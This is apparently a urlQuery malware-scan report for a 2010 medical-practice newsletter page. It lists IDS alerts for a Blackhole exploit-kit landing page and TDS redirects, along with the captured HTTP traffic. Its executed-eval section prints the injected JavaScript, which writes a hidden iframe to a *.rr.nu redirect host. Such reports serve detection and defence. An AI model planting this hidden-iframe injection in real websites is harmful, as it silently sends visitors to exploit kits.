Overview

URLhttp://www.practicehelpers.com/newsletter/picerno/february/2010/
IP216.250.114.30
ASNAS8560 1&1 Internet AG
Location United States
Report completed2012-11-08 04:15:39 CET
StatusLoading report..
urlQuery Alerts Detected malicious iframe injection
Detected a TDS URL pattern


Settings

UserAgentMozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Adobe Reader8.0
Java1.6.0_26


Intrusion Detection Systems

Suricata /w Emerging Threats Pro
Timestamp Source IP Destination IP Severity Alert
2012-11-08 04:15:05 urlQuery Client 67.208.74.712ET CURRENT_EVENTS Likely TDS redirecting to exploit kit
2012-11-08 04:15:05 urlQuery Client 67.208.74.712ET CURRENT_EVENTS HTTP Request to a *.rr.nu domain
2012-11-08 04:15:05 urlQuery Client 173.194.69.1552ET CURRENT_EVENTS HTTP Request to a *.rr.nu domain
2012-11-08 04:15:05 urlQuery Client 67.208.74.122ET CURRENT_EVENTS HTTP Request to a *.rr.nu domain
2012-11-08 04:15:06 urlQuery Client 67.208.74.122ET CURRENT_EVENTS HTTP Request to a *.rr.nu domain
2012-11-08 04:15:06 urlQuery Client 173.194.69.1552ET CURRENT_EVENTS HTTP Request to a *.rr.nu domain
2012-11-08 04:15:06 urlQuery Client 67.208.74.122ET CURRENT_EVENTS HTTP Request to a *.rr.nu domain
2012-11-08 04:15:06 urlQuery Client 67.208.74.122ET CURRENT_EVENTS HTTP Request to a *.rr.nu domain
2012-11-08 04:15:06 urlQuery Client 173.194.69.1552ET CURRENT_EVENTS HTTP Request to a *.rr.nu domain
2012-11-08 04:15:06 urlQuery Client 67.208.74.122ET CURRENT_EVENTS HTTP Request to a *.rr.nu domain
2012-11-08 04:15:06 urlQuery Client 173.194.69.1542ET CURRENT_EVENTS HTTP Request to a *.rr.nu domain
2012-11-08 04:15:06 urlQuery Client 173.194.69.1022ET CURRENT_EVENTS HTTP Request to a *.rr.nu domain
2012-11-08 04:15:06 urlQuery Client 173.194.69.1022ET CURRENT_EVENTS HTTP Request to a *.rr.nu domain
2012-11-08 04:15:06 urlQuery Client 67.208.74.122ET CURRENT_EVENTS HTTP Request to a *.rr.nu domain
Snort /w Sourcefire VRT
Timestamp Source IP Destination IP Severity Alert
2012-11-08 04:15:04 216.250.114.30 urlQuery Client1INDICATOR-OBFUSCATION Javascript obfuscation - eval
2012-11-08 04:15:04 216.250.114.30 urlQuery Client1EXPLOIT-KIT Blackhole landing page download attempt


Recent reports on same IP/ASN/Domain

Last 6 reports on IP: 216.250.114.30

Date Alerts / IDS URL IP
2012-11-16 09:28:092 / 15http://practicehelpers.com/newsletter/picerno/september/2010/216.250.114.30
2012-11-12 13:23:512 / 14http://www.practicehelpers.com/newsletter/premier/august/2008/index.htm216.250.114.30
2012-11-12 13:23:502 / 13http://www.practicehelpers.com/newsletter/premier/june/2008/index.htm216.250.114.30
2012-11-12 13:23:482 / 14http://www.practicehelpers.com/newsletter/picerno/june/2010/216.250.114.30
2012-11-12 13:23:472 / 15http://www.practicehelpers.com/newsletter/walker/july/2011/216.250.114.30
2012-11-12 13:23:462 / 17http://www.practicehelpers.com/newsletter/picerno/february/2010/216.250.114.30

Last 6 reports on ASN: AS8560 1&1 Internet AG

Date Alerts / IDS URL IP
2013-02-28 04:14:040 / 1http://www.luster-adv.com/gallery/Fusion/images/logos.gif?21ce5=13846974.208.177.94
2013-02-28 04:10:430 / 5http://strangebeaver.com74.208.199.235
2013-02-28 03:59:510 / 2http://www.wasserpark-feldkirchen.de/js/mootools.js195.20.240.25
2013-02-28 03:39:590 / 3http://www.barant-boulangerie.com/patisserie.htm82.165.59.139
2013-02-28 03:38:240 / 1http://www.multilingua-international.com/jnv/478.dkz1gpl4?e644cd9vq1ktw5f82.165.94.145
2013-02-28 03:33:520 / 3http://www.f-et-couleur.fr/?tazmon82.165.101.163

Last 6 reports on domain: www.practicehelpers.com

Date Alerts / IDS URL IP
2012-11-12 13:23:512 / 14http://www.practicehelpers.com/newsletter/premier/august/2008/index.htm216.250.114.30
2012-11-12 13:23:502 / 13http://www.practicehelpers.com/newsletter/premier/june/2008/index.htm216.250.114.30
2012-11-12 13:23:482 / 14http://www.practicehelpers.com/newsletter/picerno/june/2010/216.250.114.30
2012-11-12 13:23:472 / 15http://www.practicehelpers.com/newsletter/walker/july/2011/216.250.114.30
2012-11-12 13:23:462 / 17http://www.practicehelpers.com/newsletter/picerno/february/2010/216.250.114.30
2012-11-12 13:23:462 / 12http://www.practicehelpers.com/newsletter/picerno/september/2010/216.250.114.30



JavaScript

Executed Scripts (10)


Executed Evals (1)

#1 JavaScript::Eval (size: 581, repeated: 1) - Alert detect on script (Severity: 2)

		if (document.getElementsByTagName('body')[0]) {
		    iframer();
		} else {
		    document.write("<iframe src='http://emfcmfvpw.rr.nu/t/vc.php?go=2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
		}
		function iframer() {
		    var f = document.createElement('iframe');
		    f.setAttribute('src', 'http://emfcmfvpw.rr.nu/t/vc.php?go=2');
		    f.style.visibility = 'hidden';
		    f.style.position = 'absolute';
		    f.style.left = '0';
		    f.style.top = '0';
		    f.setAttribute('width', '10');
		    f.setAttribute('height', '10');
		    document.getElementsByTagName('body')[0].appendChild(f);
		}

Executed Writes (6)

#1 JavaScript::Write (size: 646, repeated: 1) 

<!doctype html><html><body><script>google_ad_channel="";google_ad_client="pub-2844624690808284";google_ad_format="728x90_as";google_ad_height=90;google_ad_type="text_image";google_ad_width=728;google_color_bg="FFFFFF";google_color_border="FFFFFF";google_color_link="0000FF";google_color_text="000000";google_color_url="008000";google_show_ads_impl=true;google_unique_id=1;google_async_iframe_id="aswift_0";google_ad_unit_key="2793510391";google_start_time=1352344506277;google_expand_experiment="none";google_bpp=11;</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20121031/r20120730/show_ads_impl.js"></script></body></html>

#2 JavaScript::Write (size: 923, repeated: 1) 

<iframe id="google_ads_frame1" name="google_ads_frame1" width="728" height="90" frameborder="0" src="http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2844624690808284&format=728x90_as&output=html&h=90&w=728&ad_type=text_image&ea=0&color_bg=FFFFFF&color_border=FFFFFF&color_link=0000FF&color_text=000000&color_url=008000&flash=10.0.45&url=http%3A%2F%2Fwww.practicehelpers.com%2Fnewsletter%2Fpicerno%2Ffebruary%2F2010%2F&dt=1352344506277&bpp=11&shv=r20121031&jsv=r20110914&correlator=1352344506546&frm=24&adk=2793510391&ga_vid=1073699447.1352344507&ga_sid=1352344507&ga_hid=456231041&ga_fc=0&u_tz=60&u_his=1&u_java=1&u_h=885&u_w=1176&u_ah=855&u_aw=1176&u_cd=24&u_nplug=8&u_nmime=54&dff=arial&dfs=11&adx=-12245933&ady=-12245933&biw=-12245933&bih=-12245933&isw=10&ish=10&ifk=1748394117&oid=3&fu=0&ifi=1&dtd=279" marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" scrolling="no"></iframe>

#3 JavaScript::Write (size: 141, repeated: 1) 

<iframe src='http://emfcmfvpw.rr.nu/t/vc.php?go=2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>

#4 JavaScript::Write (size: 766, repeated: 1) 

<ins style="display:inline-table;border:none;height:90px;margin:0;padding:0;position:relative;visibility:visible;width:728px"><ins id="aswift_0_anchor" style="display:block;border:none;height:90px;margin:0;padding:0;position:relative;visibility:visible;width:728px"><iframe allowtransparency="true" frameborder="0" height="90" hspace="0" marginwidth="0" marginheight="0" onload="var i=this.id,s=window.google_iframe_oncopy,H=s&amp;&amp;s.handlers,h=H&amp;&amp;H[i],w=this.contentWindow,d;try{d=w.document}catch(e){}if(h&amp;&amp;d&amp;&amp;(!d.body||!d.body.firstChild)){if(h.call){setTimeout(h,0)}else if(h.match){w.location.replace(h)}}" scrolling="no" vspace="0" width="728" id=aswift_0 name=aswift_0 style="left:0;position:absolute;top:0;" ></iframe></ins></ins>

#5 JavaScript::Write (size: 84, repeated: 1) 

<script src='http://www.google-analytics.com/ga.js' type='text/javascript'></script>

#6 JavaScript::Write (size: 105, repeated: 1) 

<script>google_protectAndRun("ads_core.google_render_ad", google_handleError, google_render_ad);</script>


HTTP Transactions (40)


Request Response 
GET /t/vc.php?go=2 HTTP/1.1

Host: emfcmfvpw.rr.nu

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.practicehelpers.com/newsletter/picerno/february/2010/
 
HTTP/1.1 301 Moved Permanently

Content-Type: text/plain; charset=iso-8859-1

Date: Thu, 08 Nov 2012 03:15:05 GMT
Server: Apache/1.3.34 (Debian) mod_perl/1.29
Location: http://domainpark.sitelutions.com/redir_not_found/redir_not_found.shtml?emfcmfvpw.rr.nu
Content-Length: 0
Connection: close
GET /newsletter/picerno/february/2010/index_files/lines_backgroud_picerno.jpg HTTP/1.1

Host: www.practicehelpers.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.practicehelpers.com/newsletter/picerno/february/2010/
 
HTTP/1.1 200 OK

Content-Type: image/jpeg

Date: Thu, 08 Nov 2012 03:15:05 GMT
Server: Apache
Last-Modified: Tue, 23 Oct 2012 20:58:32 GMT
Etag: &quot;810fd78e-900-4ccc03b912e00&quot;
Accept-Ranges: bytes
Content-Length: 2304
Keep-Alive: timeout=2, max=200
Connection: Keep-Alive
GET /newsletter/picerno/february/2010/index_files/6eedd4ef-a.gif HTTP/1.1

Host: www.practicehelpers.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.practicehelpers.com/newsletter/picerno/february/2010/
 
HTTP/1.1 200 OK

Content-Type: image/gif

Date: Thu, 08 Nov 2012 03:15:05 GMT
Server: Apache
Last-Modified: Tue, 23 Oct 2012 20:58:44 GMT
Etag: &quot;810fd785-100-4ccc03c484900&quot;
Accept-Ranges: bytes
Content-Length: 256
Keep-Alive: timeout=2, max=200
Connection: Keep-Alive
GET /newsletter/picerno/february/2010/ HTTP/1.1

Host: www.practicehelpers.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
 
HTTP/1.1 200 OK

Content-Type: text/html

Date: Thu, 08 Nov 2012 03:15:04 GMT
Server: Apache
Last-Modified: Tue, 23 Oct 2012 20:58:16 GMT
Etag: &quot;ce38e-a2d9-4ccc03a9d0a00&quot;
Accept-Ranges: bytes
Content-Length: 41689
Keep-Alive: timeout=2, max=200
Connection: Keep-Alive
GET /newsletter/picerno/february/2010/index_files/93b532b6-e.jpg HTTP/1.1

Host: www.practicehelpers.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.practicehelpers.com/newsletter/picerno/february/2010/
 
HTTP/1.1 200 OK

Content-Type: image/jpeg

Date: Thu, 08 Nov 2012 03:15:05 GMT
Server: Apache
Last-Modified: Tue, 23 Oct 2012 20:58:42 GMT
Etag: &quot;810fd786-200-4ccc03c29c480&quot;
Accept-Ranges: bytes
Content-Length: 512
Keep-Alive: timeout=2, max=200
Connection: Keep-Alive
GET /newsletter/picerno/february/2010/index_files/a65506ff-f.jpg HTTP/1.1

Host: www.practicehelpers.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.practicehelpers.com/newsletter/picerno/february/2010/
 
HTTP/1.1 200 OK

Content-Type: image/jpeg

Date: Thu, 08 Nov 2012 03:15:05 GMT
Server: Apache
Last-Modified: Tue, 23 Oct 2012 20:58:42 GMT
Etag: &quot;810fd787-200-4ccc03c29c480&quot;
Accept-Ranges: bytes
Content-Length: 512
Keep-Alive: timeout=2, max=199
Connection: Keep-Alive
GET /newsletter/picerno/february/2010/index_files/DrCote-200.jpg HTTP/1.1

Host: www.practicehelpers.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.practicehelpers.com/newsletter/picerno/february/2010/
 
HTTP/1.1 200 OK

Content-Type: image/jpeg

Date: Thu, 08 Nov 2012 03:15:05 GMT
Server: Apache
Last-Modified: Tue, 23 Oct 2012 20:58:38 GMT
Etag: &quot;810fd789-2838-4ccc03becbb80&quot;
Accept-Ranges: bytes
Content-Length: 10296
Keep-Alive: timeout=2, max=199
Connection: Keep-Alive
GET /redir_not_found/redir_not_found.shtml?emfcmfvpw.rr.nu HTTP/1.1

Host: domainpark.sitelutions.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.practicehelpers.com/newsletter/picerno/february/2010/
 
HTTP/1.1 200 OK

Content-Type: text/html

Date: Thu, 08 Nov 2012 03:15:05 GMT
Server: Apache
Accept-Ranges: bytes
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
GET /pagead/show_ads.js HTTP/1.1

Host: pagead2.googlesyndication.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://domainpark.sitelutions.com/redir_not_found/redir_not_found.shtml?emfcmfvpw.rr.nu
If-None-Match: 15032493890200785914
 
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=UTF-8

P3P: policyref=&quot;http://www.googleadservices.com/pagead/p3p.xml&quot;, CP=&quot;NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC&quot;
Etag: 11458789474174950078
Date: Thu, 08 Nov 2012 02:35:02 GMT
Expires: Thu, 08 Nov 2012 03:35:02 GMT
X-Content-Type-Options: nosniff
Content-Disposition: attachment
Content-Encoding: gzip
Server: cafe
Content-Length: 5118
X-XSS-Protection: 1; mode=block
Age: 2403
Cache-Control: public, max-age=3600
GET /newsletter/picerno/february/2010/index_files/lip-plumper-special3a.jpg HTTP/1.1

Host: www.practicehelpers.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.practicehelpers.com/newsletter/picerno/february/2010/
 
HTTP/1.1 200 OK

Content-Type: image/jpeg

Date: Thu, 08 Nov 2012 03:15:05 GMT
Server: Apache
Last-Modified: Tue, 23 Oct 2012 20:58:28 GMT
Etag: &quot;810fd791-59c3-4ccc03b542500&quot;
Accept-Ranges: bytes
Content-Length: 22979
Keep-Alive: timeout=2, max=198
Connection: Keep-Alive
GET /include_files/css/sitelutions1.css HTTP/1.1

Host: domainpark.sitelutions.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://domainpark.sitelutions.com/redir_not_found/redir_not_found.shtml?emfcmfvpw.rr.nu
 
HTTP/1.1 200 OK

Content-Type: text/css

Date: Thu, 08 Nov 2012 03:15:05 GMT
Server: Apache
Last-Modified: Thu, 03 Jun 2010 17:25:23 GMT
Accept-Ranges: bytes
Content-Length: 4200
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /newsletter/picerno/february/2010/index_files/style.css HTTP/1.1

Host: www.practicehelpers.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.practicehelpers.com/newsletter/picerno/february/2010/
 
HTTP/1.1 200 OK

Content-Type: text/css

Date: Thu, 08 Nov 2012 03:15:04 GMT
Server: Apache
Last-Modified: Tue, 23 Oct 2012 20:58:22 GMT
Etag: &quot;810fd798-ffeb-4ccc03af89780&quot;
Accept-Ranges: bytes
Content-Length: 65515
Keep-Alive: timeout=2, max=200
Connection: Keep-Alive
GET /newsletter/picerno/february/2010/index_files/picerno_header.jpg HTTP/1.1

Host: www.practicehelpers.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.practicehelpers.com/newsletter/picerno/february/2010/
 
HTTP/1.1 200 OK

Content-Type: image/jpeg

Date: Thu, 08 Nov 2012 03:15:05 GMT
Server: Apache
Last-Modified: Tue, 23 Oct 2012 20:58:26 GMT
Etag: &quot;810fd796-7400-4ccc03b35a080&quot;
Accept-Ranges: bytes
Content-Length: 29696
Keep-Alive: timeout=2, max=200
Connection: Keep-Alive
GET /newsletter/picerno/february/2010/index_files/drpicerno.jpg HTTP/1.1

Host: www.practicehelpers.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.practicehelpers.com/newsletter/picerno/february/2010/
 
HTTP/1.1 200 OK

Content-Type: image/jpeg

Date: Thu, 08 Nov 2012 03:15:05 GMT
Server: Apache
Last-Modified: Tue, 23 Oct 2012 20:58:36 GMT
Etag: &quot;810fd78a-1b00-4ccc03bce3700&quot;
Accept-Ranges: bytes
Content-Length: 6912
Keep-Alive: timeout=2, max=197
Connection: Keep-Alive
GET /newsletter/picerno/february/2010/index_files/picerno_botox_latisse_feb2010.gif HTTP/1.1

Host: www.practicehelpers.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.practicehelpers.com/newsletter/picerno/february/2010/
 
HTTP/1.1 200 OK

Content-Type: image/gif

Date: Thu, 08 Nov 2012 03:15:05 GMT
Server: Apache
Last-Modified: Tue, 23 Oct 2012 20:58:30 GMT
Etag: &quot;810fd792-b77b-4ccc03b72a980&quot;
Accept-Ranges: bytes
Content-Length: 46971
Keep-Alive: timeout=2, max=199
Connection: Keep-Alive
GET /newsletter/picerno/february/2010/index_files/lip-plumper-special2.jpg HTTP/1.1

Host: www.practicehelpers.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.practicehelpers.com/newsletter/picerno/february/2010/
 
HTTP/1.1 200 OK

Content-Type: image/jpeg

Date: Thu, 08 Nov 2012 03:15:05 GMT
Server: Apache
Last-Modified: Tue, 23 Oct 2012 20:58:32 GMT
Etag: &quot;810fd790-6b6f-4ccc03b912e00&quot;
Accept-Ranges: bytes
Content-Length: 27503
Keep-Alive: timeout=2, max=198
Connection: Keep-Alive
GET /newsletter/picerno/february/2010/index_files/elizabeth_picerno2.jpg HTTP/1.1

Host: www.practicehelpers.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.practicehelpers.com/newsletter/picerno/february/2010/
 
HTTP/1.1 200 OK

Content-Type: image/jpeg

Date: Thu, 08 Nov 2012 03:15:06 GMT
Server: Apache
Last-Modified: Tue, 23 Oct 2012 20:58:36 GMT
Etag: &quot;810fd78c-2ac7-4ccc03bce3700&quot;
Accept-Ranges: bytes
Content-Length: 10951
Keep-Alive: timeout=2, max=199
Connection: Keep-Alive
GET /newsletter/picerno/february/2010/index_files/b3886eb4-a.jpg HTTP/1.1

Host: www.practicehelpers.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.practicehelpers.com/newsletter/picerno/february/2010/
 
HTTP/1.1 200 OK

Content-Type: image/jpeg

Date: Thu, 08 Nov 2012 03:15:06 GMT
Server: Apache
Last-Modified: Tue, 23 Oct 2012 20:58:40 GMT
Etag: &quot;810fd788-200-4ccc03c0b4000&quot;
Accept-Ranges: bytes
Content-Length: 512
Keep-Alive: timeout=2, max=199
Connection: Keep-Alive
GET /newsletter/picerno/february/2010/index_files/lip-plumper-special1.jpg HTTP/1.1

Host: www.practicehelpers.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.practicehelpers.com/newsletter/picerno/february/2010/
 
HTTP/1.1 200 OK

Content-Type: image/jpeg

Date: Thu, 08 Nov 2012 03:15:05 GMT
Server: Apache
Last-Modified: Tue, 23 Oct 2012 20:58:34 GMT
Etag: &quot;810fd78f-945a-4ccc03bafb280&quot;
Accept-Ranges: bytes
Content-Length: 37978
Keep-Alive: timeout=2, max=199
Connection: Keep-Alive
GET /newsletter/picerno/february/2010/index_files/201ebaa9-0.jpg HTTP/1.1

Host: www.practicehelpers.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.practicehelpers.com/newsletter/picerno/february/2010/
 
HTTP/1.1 200 OK

Content-Type: image/jpeg

Date: Thu, 08 Nov 2012 03:15:06 GMT
Server: Apache
Last-Modified: Tue, 23 Oct 2012 20:58:44 GMT
Etag: &quot;810fd784-200-4ccc03c484900&quot;
Accept-Ranges: bytes
Content-Length: 512
Keep-Alive: timeout=2, max=196
Connection: Keep-Alive
GET /newsletter/picerno/february/2010/index_files/picerno_footer.jpg HTTP/1.1

Host: www.practicehelpers.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.practicehelpers.com/newsletter/picerno/february/2010/
 
HTTP/1.1 200 OK

Content-Type: image/jpeg

Date: Thu, 08 Nov 2012 03:15:06 GMT
Server: Apache
Last-Modified: Tue, 23 Oct 2012 20:58:24 GMT
Etag: &quot;810fd794-1b00-4ccc03b171c00&quot;
Accept-Ranges: bytes
Content-Length: 6912
Keep-Alive: timeout=2, max=198
Connection: Keep-Alive
GET /newsletter/picerno/february/2010/index_files/practicehelpers_logo2.gif HTTP/1.1

Host: www.practicehelpers.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.practicehelpers.com/newsletter/picerno/february/2010/
 
HTTP/1.1 200 OK

Content-Type: image/gif

Date: Thu, 08 Nov 2012 03:15:06 GMT
Server: Apache
Last-Modified: Tue, 23 Oct 2012 20:58:22 GMT
Etag: &quot;810fd797-e97-4ccc03af89780&quot;
Accept-Ranges: bytes
Content-Length: 3735
Keep-Alive: timeout=2, max=197
Connection: Keep-Alive
GET /newsletter/picerno/february/2010/index_files/empty.gif HTTP/1.1

Host: www.practicehelpers.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.practicehelpers.com/newsletter/picerno/february/2010/
 
HTTP/1.1 200 OK

Content-Type: image/gif

Date: Thu, 08 Nov 2012 03:15:06 GMT
Server: Apache
Last-Modified: Tue, 23 Oct 2012 20:58:34 GMT
Etag: &quot;810fd78d-2b-4ccc03bafb280&quot;
Accept-Ranges: bytes
Content-Length: 43
Keep-Alive: timeout=2, max=198
Connection: Keep-Alive
GET /newsletter/picerno/february/2010/images/back.jpg HTTP/1.1

Host: www.practicehelpers.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.practicehelpers.com/newsletter/picerno/february/2010/
 
HTTP/1.1 404 Not Found

Content-Type: text/html

Date: Thu, 08 Nov 2012 03:15:06 GMT
Server: Apache
Content-Length: 640
Keep-Alive: timeout=2, max=198
Connection: Keep-Alive
GET /image_files/dot.gif HTTP/1.1

Host: domainpark.sitelutions.com

